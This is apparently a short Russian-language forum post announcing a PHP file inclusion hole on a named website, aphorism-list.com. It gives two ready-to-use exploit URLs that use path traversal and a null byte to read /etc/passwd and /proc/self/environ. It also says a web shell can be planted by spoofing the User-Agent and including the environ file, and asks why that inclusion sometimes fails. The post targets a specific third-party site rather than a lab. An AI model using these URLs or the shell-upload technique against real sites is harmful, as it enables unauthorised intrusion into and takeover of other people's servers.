Пхп-инъекция на сайте aphorism-list.com с возможностью залить шелл.

http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../proc/self/environ%00

Шел без проблем льется при подмене user-agent и инклудом /proc/self/environ (кто читал последнего хакера точно поймет)

Кстати, на хостинге лежит дистрибутив windows xp sp3)

И еще, подскажите, почему не всегда можно заинклудить /proc/self/environ (естественно системы никсовые)? Прав не хватает?